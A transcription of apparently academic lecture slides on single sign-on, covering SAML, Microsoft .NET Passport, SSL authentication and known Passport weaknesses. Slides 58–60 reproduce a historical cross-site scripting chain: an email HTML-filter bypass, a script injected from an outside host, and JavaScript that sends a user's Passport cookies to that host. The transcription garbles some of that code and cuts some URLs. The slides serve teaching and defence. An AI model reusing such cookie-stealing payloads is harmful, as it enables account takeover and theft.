Single Sign-on Systems SS5

Transcription

1 Single Sign-on Systems SS5

2 Scenario Going to travel Sign in for booking flight ticket Sign in for booking hotel room Sign in for renting a car

3 Multi sign on is troublesome Is it possible to just sign-on once to perform all the actions? Single sign-on can be used to answer that question.

4 Introduction What is single sign-on How does it works Two single sign-on systems: SAML Microsoft passport Attack to the Microsoft passport Advantage and disadvantage of single sign-on

5 Definitions of Single Sign-On (SSO) on the Web: Users sign onto a site only once and are given access to one or more applications in a single domain or across multiple domains. [1] A mechanism to verify a user across multiple applications through a single authentication challenge. WebSphere Portal Server uses Java Authentication and Authorization Services to achieve single sign-on. [2] One log-on provides access to all resources of the network, LAN, or WAN. [3]

6 It can be illustrated in two different scopes. One is in the client/server relationship, the other is in the e-commerce domain.

7 In Client / Server relationship In any client/server relationship, single sign-on is a session/user authentication process that permits a user to enter one name and password in order to access multiple applications. [4]

8 In E-commerce In e-commerce, the single sign-on (sometimes referred to as SSO) is designed to centralize consumer financial information on one server- not only for the consumer's convenience, but also to offer increased security by limiting the number of times the consumer enters credit card numbers or other sensitive information used in billing. [5]

9 How does it work?

10 Password synchronization The password synchronization is the process of changing each password for different applications to the same value, so that the user always enters the same password. Once you install password synchronization software, users will enter the same password when they login to any of the synchronized systems, such as to their network, finance system, , calendar or the mainframe.

11 Password synchronization VS Single sign-on Password Synchronization Single Sign-on Process Login times Simply changes all applications to the same password. User continues to login to each of those applications separately, but uses same password. Several times depends on the application required Use single username and password to sign in to one site, the client authentication of other site done by specific server Once for every domain

12 Password synchronization VS Single sing-on (con) Manage credential data Weak password Security Manage passwords only, Can only match the policy of the weakest system Once one application is compromised, all the other applications can be accessed, the sensitive data will be obtained. Use specific protocol to manage the client authentication and the secrete information Only one password, can make very secure Can encrypt to the sensitive data and send it by the SSL save channel

13 SAML What is SAML? SAML (Security Assertion Markup Language) an XML framework for exchanging security information over the Internet.

14 How it works 1.The service provider received the client request, and it sent the request to Identity provider to do the client authentication. 2.Identity provider authenticate the client, create the assertion, and pass it back to the service provider. SAML assertions can be add a SOAP Header blocks, and pass by the HTTP protocol

15 Request from the Service provider Here, a sample SAML-compliant request is sent from a service provider requesting password authentication by the identity provider. <samlp: Request...> <samlp: AttributeQuery> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap"/> </ saml: Subject> <saml: AttributeDesignator AttributeName="Employee_ ID" AttributeNamespace="sun. com"> </ saml: AttributeDesignator> </ samlp: AttributeQuery> </ samlp: Request>

16 Response from the Identity provider In response, the issuing authority asserts that the subject (S) was authenticated by means (M) at time (T). <samlp: Response MajorVersion="1" MinorVersion="0" RequestID=" " InResponseTo=" " StatusCode="/features/2002/05/Success"> <saml: Assertion MajorVersion="1" MinorVersion="0" AssertionID=" " Issuer="Sun Microsystems, Inc." IssueInstant=" T10: 00: 23Z"> <saml: Conditions NotBefore=" T10: 00: 30Z" NotAfter=" T10: 15: 00Z" /> <saml: AuthenticationStatement AuthenticationMethod="Password" AuthenticationInstant=" T10: 00: 20Z"> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap" /> </ saml: Subject> </ saml: AuthenticationStatement> </ saml: Assertion> </ samlp: Response>

17 What is SAML composed of Assertions Request/response protocols Bindings (the SOAP-over-HTTP method of transporting SAML requests and responses) Profiles (for embedding and extracting SAML assertions in a framework or protocol)

18 .NET Passport

19 .NET Passport Microsoft.NET Passport - Passport single sign in service - Kids Passport service Passport supplies registered users an electronic ticket. With this ticket users are authorized to access pages in participating sites.

20 .NET Passport An implementation of Single Sign-On system, based on the cookie mechanism. Employing technique to prevent attacks - Captcha telling human from computers - Secure Sockets Layer (SSL)

21 .NET Passport Registration process - Information stored in passport account -Captcha - Validation Authentication process - Cookies written by passport - Navigate to another Participating Site - Secure Sockets Layer (SSL)

22 Passport service Three parts in the system

23 Registration process (1) 1 In this example the user browses to Site A and click the Sign In button 2 The user is redirected to a co-branded registration page displaying the registration fields that were chosen by Site A. 3 The user reads and accepts terms of use, and submits the registration form. 4 The user is then redirected back to Site A with their encrypted authentication ticket and profile information attached. 5 Site A decrypts the authentication ticket and profile information and continues their registration process, or grants access to their site. [5]

24 Registration process (2) Information Stored in a.net Passport - Credential stored only within the Passport service - Profile data stored within the Passport service and shared with participating sites based on user consent

25 Registration process (2)

26 Registration process (3) Captcha Human Interaction Protocol - telling human from computers by asking registers to type in alphanumeric characters from a picture - bots attackers submit thousands of fake registrations in short time

27 Registration process (3) CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. [6] CAPTCHA test is a program that can generate and grade tests that: - Most humans can pass. - Current computer programs can't pass. For example, humans can read distorted text as the one shown below but current computer programs can't:

28 Registration process (4) Validation - service sends a welcome message to verify registration - efficiently prevent addresses confusion Unique Identifiers When registering successfully, each account is assigned a 64-bit Passport User ID (PUID).

29 Authentication Process (1) 1. User browses to participating site or service and clicks Sign In button or link. 2. User is redirected to Passport.net 3. Passport checks if the user has a Ticket Granting Cookie (TGT) in their browser s cookie file, if one is detected they skip to step 4 and never see the Passport login UI. If the TGT does not satisfy the time since sign in rule requested by Site A, then Passport redirects the user to a log on page. If the user enters the correct information, they proceed. 4. The user is redirected back to Site A with their encrypted authentication ticket and profile information attached. 5. Site A decrypts authentication ticket and profile information, and signs the customer into their site. 6. User accesses the page, resource, or service they requested from Site A. [7]

30 Authentication Process (2) Cookies written by Passport Passport writes a cookie, called ticket-granting-cookie, on the user s browser. This cookie can be used as electronic tickets in subsequent access. - Cookies with credentials are encrypted with Passport key - Cookies with profile information are encrypted with participating sites key

31 Authentication Process (3) Navigate to another Participating Site - without re-entering password - log current site in cookie

32 Authentication Process (4) Secure Sockets Layer (SSL) A security enhancing protocol providing data encryption, server authentication, and message integrity for a connection to the Internet - Using Public Key Cryptography for Authentication - Certificate mechanism

33 Secure Sockets Layer (SSL) Using Public Key Cryptography for Authentication Alice wants to authenticate Bob. Bob has a pair of keys, one public and one private. Bob discloses the public key to Alice (this is discussed in the "Handing Out Public Keys" ) Random msg Bob {Random msg} Bob s private key Alice

34 Secure Sockets Layer (SSL) Additional consideration Bob encrypted a unknown message??? Now Bob constructs a message digest and encrypts that message digest - The digest is difficult to reverse. - An impersonator has difficulty finding a different message that computes to the same digest value. Random msg Bob {digest [Random msg]} Bob s private key Alice

35 Secure Sockets Layer (SSL) Additional consideration(2) digital signature Originating Data for Authentication Alice -->Bob hello,are you bob? Bob-->Alice Alice,This Is bob{digest[alice,this Is Bob]}bobs-private-key

36 Secure Sockets Layer (SSL) Handing Out Public Keys certificate mechanism A certificate contains the following information: The name of the certificate issuer. The entity for whom the certificate is being issued (also known as the subject). The public key of the subject. Some time stamps. [8] The certificate is signed by using the private key of the certificate issuer.

37 Secure Sockets Layer (SSL) Certificates are a standard method to bind a public key to a name. A-->B hello B-->A Hi, I'm Bob, bobs-certificate A-->B prove it (Everyone knows the public key of the certificate issuer) B-->A Alice, This Is bob{ digest[alice, This Is Bob] } bobs-private-key Exchanging a Secret After A has authenticated B, A can send B a message that only B can decode as follows A->B {secret} Bob's_public_key secret is a key to a symmetric cryptographic algorithm After authentication, both A and B send message encrypted with the symmetric key.

38 Secure Sockets Layer (SSL) Potential attack! B-->M {some message}secret-key M-->A Garble[ {some message}secret-key ] msg1 msg1 Bob msg2 msg2 Alice Mallory

39 Secure Sockets Layer (SSL) Message Authentication Code (MAC) MAC := digest[ some_message, secret ] In.NET Passport, a 128-bit MAC is used. A-->B hello B-->A Hi, I'm Bob, bobs-certificate A-->B prove it B-->A {digest[alice, This Is Bob] } bobsprivate-key A-->B ok bob, here is a secret {secret} bobs-public-key B-->A {some message,mac}secret-key

40 MS Passport security weaknesses Cookies problem Key management Passport Server attack Hotmail credential assignment

41 Cookies problems Passport cookies contains sensitive data. On a public machine, a user who forgets to log out could leave valid authentication for any users to misuse. Persistent cookies choice. It is convenient, but risky. Cookies are more social than technological. It may compromise user privacy

42 Key management Generate and Transfer key These keys should be generated randomly and securely. These keys are transferred by an SSL connection. This is likely to lead to potential breaches. Single key to encrypt all the cookies MS Passport uses a single key to encrypt all the cookies and store the information in cookies on user s machines. So it could be a better way to use a master key to generate a unique key.

43 Passport Server Attack When you become a center point, you will become an attractive target for attack. Different from traditional authentication, Passport Server makes decisions about the authenticity of all users and stores all data of users, including users credit card numbers. It is extremely attractive!

44 Hotmail credential assignment When users log into hotmail, they actually run the passport protocol. Unfortunately, Hotmail has been fraught with security problems. The attacker can log into user s Hotmail account without knowing the password. Then the attacker may go to the online shops using user s wallet. For example: Emil Glosserman, Internet security expert, attacked the Microsoft Hotmail and Passport server systems twice.

45 Attack to the MS Passport Fake merchant attack Active attack DNS attack Cookie attack

46 Fake merchant attack Bob = Passport user Mallory = Attacker of Malicious party Assumption: Bob get accustomed to using passport and trust the security of the passport server.

47 How to attack? 1. Mallory sets up a phony web store to sell some attractive things. 2. Mallory gets a certificate for a web site, called pasport.com. And Mallory sets up his web site which is exactly the same as a real passport.com. 3. So Bob want to buy something in Mallory s shop, click sign-in, the server creates a redirect to Mallory s pasport.com. Bob is in the habit of filling his Address and Password. 4. After that, Mallory has got Bob s valid authentication information, and he can go to online shop, use Bob s wallet service on behalf of Bob.

48

49 Active attack Bob = Passport user Alice = trustful merchant Mallory = Attacker of Malicious party Assumption: Mallory has already accessed to network between Bob and Alice, Mallory could rewrite packets passing between Bob and Alice.

50 How to attack? 1. Bob want to buy something in Alice s shop, and sends a request to Alice. 2. Alice replies to Bob to use a login service at 3. Attacker Mallory, waiting between Bob and Alice, interrupts the packet that Alice sends to Bob, and rewrites the URL in the redirection to her fake pasport.com. 4. Bob visits Mallory s fake pasport web site, filling with the login information. He has not noticed that! 5. Now, Mallory has succeeded to attack the system. Mallory acts as a proxy between Bob and Alice, and between Bob and Passport Server.

51

52 Why Mallory succeed? Bob personal reason The redirection from Alice to Bob is not protected by SSL protocol. Passport s use of SSL connections cannot prevent the Mallory from reading and rewriting each packet, as all SSL connections are terminated on the proxy.

53 DNS Attack The security of Passport is heavily decided by the Domain Name System. So the attacker Mallory who controls Bob s DNS service could simply rewrite passport.com to the IP address of Mallory s fake pasport.com. And it will get the same result as above.

54 Cookie Attacks A variety of cookies are set in the passport.com domain, when you login to your Passport account

55 Two most important cookies: 1. MSPSec cookie : authenticates you to Passport to implement the single sign on feature 2. MSPAuth cookie: identifies you to the server via the 64-bit Passport Unique ID (PUID) associated with your account

56 The Implementation: Passport Wallet A fairly simple application implemented on top of Passport that stores your credit card and contact information

57 Stole it!! Passport Wallet doesn't provide as much security as it may appear at first glance. There are three general areas of concern. 1. User may have entered their password, but not intending to be used to access their Passport Wallet. 2. A "manual sign in" doesn't actually require that the user enter their password in some cases. MSN Messenger 3. Cross Site Scripting Bugs

58 Examples: Step: 1. Hotmail HTML Filtering Hole From: Jennifer Sparks To: Subject: Jack said I should you... Hi Ted. Jack said we would really hit it off. Maybe we can get together for drinks sometime. May be this Friday? Let me know. You can see the below for demonstration purposes. In a real exploit, you wouldn't even see it happening. <_img foo="<iframe width='80%' height='400' src='http: //alive.znep.com/~marcs/passport/grabit.htm l'></iframe>" >

59 Step 2. Setup a couple of Frames <FRAME NAME="me1" SRC=" please"> Allows us to steal the MSPSec cookie. <FRAME NAME="me2" SRC=" ttps://ww.passport.com/%22%3e%3cscript%20src='h ttp://alive.znep.com/~marcs/passport/snarf.js'% 3Ej%3C/SCRIPT%3E%3Flc%3D1033"> Exploits one of the passport.com cross site scripting if you are logged in.

60 Step 3: Stealing the Cookies The contents of Jennifer Sparks are quite simple: s = new String (document URL); If (s.indexof(' == 0) { settimeout('document.location=" + s.substring(5, s.length-1, 1000)'); } else { document.location=" /passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie); }

61 Step 4: So we have the cookies... FINISHED!!!!

62 Advantages: Although as we all see, the passport has so many risks, why do we still like to use it?

63 Make things simple!! Ease of use. Password limited to local machine. Simplified Management.

64 Business use (MS Passport) Single sign-in. Kids Passport.

65 Business Benefits of Passport Save Time and Money Required to Build Authentication Systems Offer 200 Million Passport Users Easy Access to Your Site Increase Customer Loyalty with Easy, Dependable Personalization Maintain Your Branding with Flexible Customization Maintain Ownership and Control of Your Customer Data

66 Liberty Alliance The Liberty Alliance Project is an alliance of more than 150 companies, non-profit and government organizations from around the globe. Liberty Alliance and Passport are both primarily targeted at consumers and it will be a while before there will be significant web services use by consumers.

67 The Liberty Alliance is pushing forward with its vision for an open-system single sign-on, which officials have described as a federated-view solution. The Alliance plans to have personal information controlled completely by the user

68 Liberty version 1.0 Concludes: Web Redirection, Web Services, Metadata and Schemas Theoretically, the organizations in Alliance could extend boundless. it will bring the problems about the flexibility of the system and the management of the certification.

69 Conclusion Single Sign-On enables users to login quickly and securely to all their applications, websites and mainframe sessions with just one identity. We look forward to the cooperation and competition between Liberty Alliance and Microsoft may promote the progress of single Sign in System.

70 References [1] [2] www- 3.ibm.com/software/webservers/portal/library/v12/InfoCenter/wps/glossary.ht ml [3] [4] [5] [6] Microsoft.Net Passport Review Guide [Jan.2004] [7] Telling Humans and Computers Apart Automatically L u i s v o n A h n Feb [8] XADM: How Secure Sockets Layer Works Microsoft.com Nov. 2004